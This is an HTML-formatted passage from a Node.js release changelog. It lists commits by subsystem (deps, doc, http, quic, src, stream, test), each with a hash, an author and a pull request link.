<li>[<a href="https://github.com/nodejs/node/commit/b76bfcd4fa"><code>b76bfcd4fa</code></a>] - <strong>deps</strong>: upgrade npm to 11.16.0 (npm team) <a href="https://github.com/nodejs/node/pull/63602" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63602/hovercard">#63602</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4ec142314c"><code>4ec142314c</code></a>] - <strong>deps</strong>: SQLite: cherry-pick b869ed6b067d623cb1383549f2a18aa35508385d (Junsu Han) <a href="https://github.com/nodejs/node/pull/63525" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63525/hovercard">#63525</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/19e8ce1c36"><code>19e8ce1c36</code></a>] - <strong>deps</strong>: upgrade npm to 11.15.0 (npm team) <a href="https://github.com/nodejs/node/pull/63463" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63463/hovercard">#63463</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a264260e2"><code>8a264260e2</code></a>] - <strong>deps</strong>: update sqlite to 3.53.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63217" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63217/hovercard">#63217</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/50c8ff3f94"><code>50c8ff3f94</code></a>] - <strong>deps</strong>: update simdjson to 4.6.4 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62811" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62811/hovercard">#62811</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6e56f01c4b"><code>6e56f01c4b</code></a>] - <strong>deps</strong>: V8: cherry-pick 435a2cdf664c (Matthias Liedtke) <a href="https://github.com/nodejs/node/pull/63136" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63136/hovercard">#63136</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3ba813b242"><code>3ba813b242</code></a>] - <strong>deps</strong>: cherry-pick <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/libuv/libuv/commit/a43e543/hovercard" href="https://github.com/libuv/libuv/commit/a43e543">libuv/libuv@<tt>a43e543</tt></a> (Ali Hassan) <a href="https://github.com/nodejs/node/pull/63222" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63222/hovercard">#63222</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2390e3a5ac"><code>2390e3a5ac</code></a>] - <strong>doc</strong>: remove duplicated sentences in large-pull-requests.md (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63650" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63650/hovercard">#63650</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/52a1c18374"><code>52a1c18374</code></a>] - <strong>doc</strong>: update <code>git node land</code> instructions for security releases (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63586" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63586/hovercard">#63586</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3e6b4da037"><code>3e6b4da037</code></a>] - <strong>doc</strong>: drop --experimental from --permission (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63583" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63583/hovercard">#63583</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/84d05163b9"><code>84d05163b9</code></a>] - <strong>doc</strong>: explicitly ask for reproducible in JS (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63479" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63479/hovercard">#63479</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7da2a4450e"><code>7da2a4450e</code></a>] - <strong>doc</strong>: fix URL postMessage example in worker_threads (Kit Dallege) <a href="https://github.com/nodejs/node/pull/62203" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62203/hovercard">#62203</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d79bd8b29"><code>3d79bd8b29</code></a>] - <strong>doc</strong>: clarify <code>filter</code> option of <code>sqlite.database.applyChangeset</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63515" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63515/hovercard">#63515</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4f4174aace"><code>4f4174aace</code></a>] - <strong>doc</strong>: fix double spaces in ERR_TLS_INVALID_PROTOCOL_METHOD (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63511" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63511/hovercard">#63511</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/388323ca4b"><code>388323ca4b</code></a>] - <strong>doc</strong>: fix double space in modules.md (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63512" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63512/hovercard">#63512</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5258ccc058"><code>5258ccc058</code></a>] - <strong>doc</strong>: fix "options" to "option" in tls.createServer (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63453" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63453/hovercard">#63453</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/43e83e6507"><code>43e83e6507</code></a>] - <strong>doc</strong>: fix typo in deprecations (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63434" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63434/hovercard">#63434</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f05a61d54c"><code>f05a61d54c</code></a>] - <strong>doc</strong>: remove unsupported template type from v8.md (René) <a href="https://github.com/nodejs/node/pull/63410" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63410/hovercard">#63410</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c39d5fc820"><code>c39d5fc820</code></a>] - <strong>doc</strong>: fix article usage before vowel-sound acronyms (joao-oliveira-softtor) <a href="https://github.com/nodejs/node/pull/62696" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62696/hovercard">#62696</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/398261f911"><code>398261f911</code></a>] - <strong>doc</strong>: remove the bi-monthly contributor spotlight section (Claudio Wunder) <a href="https://github.com/nodejs/node/pull/62734" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62734/hovercard">#62734</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fd9e14c405"><code>fd9e14c405</code></a>] - <strong>doc</strong>: update http2's <code>push</code> and <code>trailers</code> events with <code>rawHeaders</code> param (YuSheng Chen) <a href="https://github.com/nodejs/node/pull/63259" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63259/hovercard">#63259</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b943ce6933"><code>b943ce6933</code></a>] - <strong>doc</strong>: remove inactive members from Triagers list (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63329" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63329/hovercard">#63329</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b9cdfc022"><code>4b9cdfc022</code></a>] - <strong>doc</strong>: reference correct function in Module docs (Robin Malfait) <a href="https://github.com/nodejs/node/pull/63247" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63247/hovercard">#63247</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bed84b6df2"><code>bed84b6df2</code></a>] - <strong>doc</strong>: replace Visual Studio 2022 Evergreen version reference with 17.14 (Mike McCready) <a href="https://github.com/nodejs/node/pull/63211" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63211/hovercard">#63211</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/32ea70569b"><code>32ea70569b</code></a>] - <strong>doc</strong>: recommend explicitly Tier 1 or 2 for production applications (Mike McCready) <a href="https://github.com/nodejs/node/pull/63187" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63187/hovercard">#63187</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4627bcfd82"><code>4627bcfd82</code></a>] - <strong>doc</strong>: run license-builder (github-actions[bot]) <a href="https://github.com/nodejs/node/pull/63232" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63232/hovercard">#63232</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/28eba71845"><code>28eba71845</code></a>] - <strong>doc</strong>: add large pull requests contributing guide (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62829" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62829/hovercard">#62829</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2648efd438"><code>2648efd438</code></a>] - <strong>doc</strong>: remove unnecessary <code>&lt;!-- eslint-</code> magic comments (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63200" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63200/hovercard">#63200</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a95fc1f8fc"><code>a95fc1f8fc</code></a>] - <strong>doc</strong>: clarify SEA platform support excludes darwin-x64 (MJSHANG) <a href="https://github.com/nodejs/node/pull/63181" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63181/hovercard">#63181</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aaef29e2e1"><code>aaef29e2e1</code></a>] - <strong>doc</strong>: update release steps when post-release fails (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63131" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63131/hovercard">#63131</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d81419cf2"><code>7d81419cf2</code></a>] - <strong>doc</strong>: add Hmac.digest() documentation-only deprecation (DEP0206) (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63121" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63121/hovercard">#63121</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ececd80d81"><code>ececd80d81</code></a>] - <strong>doc</strong>: document the latest-vX.x schema (Marco Ippolito) <a href="https://github.com/nodejs/node/pull/63033" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63033/hovercard">#63033</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/27c1c1d842"><code>27c1c1d842</code></a>] - <strong>doc</strong>: remove list of versions in <code>BUILDING.md</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63113" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63113/hovercard">#63113</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e369886a65"><code>e369886a65</code></a>] - <strong>doc,sqlite</strong>: document entryPoint argument for loadExtension (Edy Silva) <a href="https://github.com/nodejs/node/pull/63152" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63152/hovercard">#63152</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4e5137cbd"><code>e4e5137cbd</code></a>] - <strong>errors</strong>: handle V8 warnings in DisallowJavascriptExecutionScope (Divyanshu Sharma) <a href="https://github.com/nodejs/node/pull/63491" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63491/hovercard">#63491</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d1f6048d2"><code>6d1f6048d2</code></a>] - <strong>fs</strong>: make <code>Date</code> properties on <code>Stats</code> enumerable (LiviaMedeiros) <a href="https://github.com/nodejs/node/pull/63328" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63328/hovercard">#63328</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/39f61fb06c"><code>39f61fb06c</code></a>] - <strong>http2</strong>: emit session close before stream close (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63414" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63414/hovercard">#63414</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a8f2127d1"><code>8a8f2127d1</code></a>] - <strong>http2</strong>: validate non-link headers in writeEarlyHints (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62017/hovercard">#62017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c05f38229b"><code>c05f38229b</code></a>] - <strong>lib</strong>: cleanup stateless diffiehellman key handling (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62645" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62645/hovercard">#62645</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1c16b45d35"><code>1c16b45d35</code></a>] - <strong>lib</strong>: refactor internal webidl converters (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62979" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62979/hovercard">#62979</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f35d6dce"><code>02f35d6dce</code></a>] - <strong>lib</strong>: define <code>kEnumerableProperty</code> atomically (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63609" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63609/hovercard">#63609</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/12c51547ba"><code>12c51547ba</code></a>] - <strong>lib</strong>: fix typos in esm loader comments (RonGamzu) <a href="https://github.com/nodejs/node/pull/63465" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63465/hovercard">#63465</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9b03b84262"><code>9b03b84262</code></a>] - <strong>lib</strong>: fix typo idenity =&gt; identity (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63112" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63112/hovercard">#63112</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a84e6b0567"><code>a84e6b0567</code></a>] - <strong>lib</strong>: fixes validator message (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62823" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62823/hovercard">#62823</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11734166a8"><code>11734166a8</code></a>] - <strong>lib</strong>: narrow ReadableStreamBYOBRequest.view return type to Uint8Array (RoomWithOutRoof) <a href="https://github.com/nodejs/node/pull/63017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63017/hovercard">#63017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7cead61d21"><code>7cead61d21</code></a>] - <strong>meta</strong>: flip mcollina emails in .mailmap (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63621" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63621/hovercard">#63621</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a08cfcfd35"><code>a08cfcfd35</code></a>] - <strong>meta</strong>: label "source maps" PRs (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63591" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63591/hovercard">#63591</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d56e8d2512"><code>d56e8d2512</code></a>] - <strong>meta</strong>: add <code>vfs</code> subsystem label (René) <a href="https://github.com/nodejs/node/pull/62331" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62331/hovercard">#62331</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6201cfe488"><code>6201cfe488</code></a>] - <strong>meta</strong>: skip scheduled workflows on forks (Jamie Magee) <a href="https://github.com/nodejs/node/pull/63565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63565/hovercard">#63565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f095e2bd31"><code>f095e2bd31</code></a>] - <strong>meta</strong>: add additional gitignore entries (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1ea52c444c"><code>1ea52c444c</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63402" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63402/hovercard">#63402</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b1b2327611"><code>b1b2327611</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63235" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63235/hovercard">#63235</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d88e130a9"><code>7d88e130a9</code></a>] - <strong>meta</strong>: ignore AI assistants files (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62612/hovercard">#62612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a53b51df38"><code>a53b51df38</code></a>] - <strong>module</strong>: load ESM helpers eagerly in the snapshot (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63550" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63550/hovercard">#63550</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/69df688fff"><code>69df688fff</code></a>] - <strong>module</strong>: fix sync hook short-circuit in require() in imported CJS (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/62920" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62920/hovercard">#62920</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/75d9a4ed47"><code>75d9a4ed47</code></a>] - <strong>node-api</strong>: support SharedArrayBuffer in napi_create_typedarray (Yilong Li) <a href="https://github.com/nodejs/node/pull/62710" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62710/hovercard">#62710</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c20aa4c47b"><code>c20aa4c47b</code></a>] - <strong>quic</strong>: add reusePort option to QuicEndpoint (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26a30d8a7f"><code>26a30d8a7f</code></a>] - <strong>quic</strong>: implement rate limiting for version nego and immediate close (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0b534b5770"><code>0b534b5770</code></a>] - <strong>quic</strong>: fixup linting issue after other changes (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b367cbe09"><code>4b367cbe09</code></a>] - <strong>quic</strong>: remove unused binding variable in session.cc (James M Snell) <a href="https://github.com/nodejs/node/pull/63177" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63177/hovercard">#63177</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2574bef5a6"><code>2574bef5a6</code></a>] - <strong>repl</strong>: fix dedup comparing normalized line against raw history (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62886" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62886/hovercard">#62886</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/30e71c7e49"><code>30e71c7e49</code></a>] - <strong>sqlite</strong>: keep source database alive during backup (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62673" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62673/hovercard">#62673</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/677ca7e76c"><code>677ca7e76c</code></a>] - <strong>src</strong>: simplify OpenSSL feature gates (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c863c75c39"><code>c863c75c39</code></a>] - <strong>src</strong>: add BoringSSL EVP enumeration fallback (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63206" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63206/hovercard">#63206</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f6b2466921"><code>f6b2466921</code></a>] - <strong>src</strong>: decouple KeyObject and CryptoKey and move CryptoKey to src (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62924" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62924/hovercard">#62924</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/92d4f07dd2"><code>92d4f07dd2</code></a>] - <strong>src</strong>: remove license headers for new node_profiling files (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63066" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63066/hovercard">#63066</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8ac5d771c8"><code>8ac5d771c8</code></a>] - <strong>src</strong>: split profiling helpers from util (Ilyas Shabi) <a href="https://github.com/nodejs/node/pull/63008" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63008/hovercard">#63008</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/85d1639495"><code>85d1639495</code></a>] - <strong>src</strong>: remove TOCTOU race condition when encoding SAB-backed <code>Buffer</code>s (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63517" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63517/hovercard">#63517</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9473c5f05c"><code>9473c5f05c</code></a>] - <strong>src</strong>: skip duplicate UTF-8 validation in TextDecoder fatal path (Mert Can Altin) <a href="https://github.com/nodejs/node/pull/63231" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63231/hovercard">#63231</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f35c91ee68"><code>f35c91ee68</code></a>] - <strong>src</strong>: improve token return value check (James M Snell) <a href="https://github.com/nodejs/node/pull/63483" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63483/hovercard">#63483</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26f677c1c5"><code>26f677c1c5</code></a>] - <strong>src</strong>: expose <code>node::RegisterContext</code> to make a node managed context (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/62322" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62322/hovercard">#62322</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/275cf909b6"><code>275cf909b6</code></a>] - <strong>src,sqlite</strong>: only pass <code>xFilter</code> when user provided a callback (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63516" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63516/hovercard">#63516</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/287e02303f"><code>287e02303f</code></a>] - <strong>src,sqlite</strong>: remove dead code (Edy Silva) <a href="https://github.com/nodejs/node/pull/63204" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63204/hovercard">#63204</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/58fa2ee189"><code>58fa2ee189</code></a>] - <strong>stream</strong>: switch to internal <code>sleep</code> binding (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63611" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63611/hovercard">#63611</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f954ab3f1a"><code>f954ab3f1a</code></a>] - <strong>stream</strong>: use data listener for compose forwarding (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63593" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63593/hovercard">#63593</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/dc57173003"><code>dc57173003</code></a>] - <strong>stream</strong>: fix Writable.toWeb() hang on synchronous drain (sangwook) <a href="https://github.com/nodejs/node/pull/61197" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/61197/hovercard">#61197</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cee279c5d6"><code>cee279c5d6</code></a>] - <strong>stream</strong>: remove unnecessary check (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63030" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63030/hovercard">#63030</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61b20f60a3"><code>61b20f60a3</code></a>] - <strong>test</strong>: update tls/crypto behaviour expectations when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a835363808"><code>a835363808</code></a>] - <strong>test</strong>: update WPT for WebCryptoAPI to 97bbc7247a (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63417" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63417/hovercard">#63417</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a00297480b"><code>a00297480b</code></a>] - <strong>test</strong>: update WPT resources, interfaces and WebCryptoAPI (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62389" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62389/hovercard">#62389</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5a95a2b055"><code>5a95a2b055</code></a>] - <strong>test</strong>: shorten path in net pipe connect errors (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63405" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63405/hovercard">#63405</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5e8ff22d8f"><code>5e8ff22d8f</code></a>] - <strong>test</strong>: remove test-node-output-v8-warning (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63469" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63469/hovercard">#63469</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ee15380950"><code>ee15380950</code></a>] - <strong>test</strong>: update test426-fixtures to 9b9e225b5a63139e9a95cdd1bf874a8f0b9d131 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63373" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63373/hovercard">#63373</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9e063d9bea"><code>9e063d9bea</code></a>] - <strong>test</strong>: update WPT for url to e4a4672e9e (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63372" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63372/hovercard">#63372</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/503bee4b43"><code>503bee4b43</code></a>] - <strong>test</strong>: deflake async-hooks statwatcher test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63396" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63396/hovercard">#63396</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cccc7c32d8"><code>cccc7c32d8</code></a>] - <strong>test</strong>: avoid test_runner watch restart in spec snapshot (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63392" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63392/hovercard">#63392</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c89489258c"><code>c89489258c</code></a>] - <strong>test</strong>: reduce watch mode restart flakiness (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63390" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63390/hovercard">#63390</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4d5e2578e"><code>e4d5e2578e</code></a>] - <strong>test</strong>: isolate rerun-failures state file under tmpdir (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63449" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63449/hovercard">#63449</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/362644a9ba"><code>362644a9ba</code></a>] - <strong>test</strong>: wait for ok before initial break after restart (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62807" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62807/hovercard">#62807</a></li>
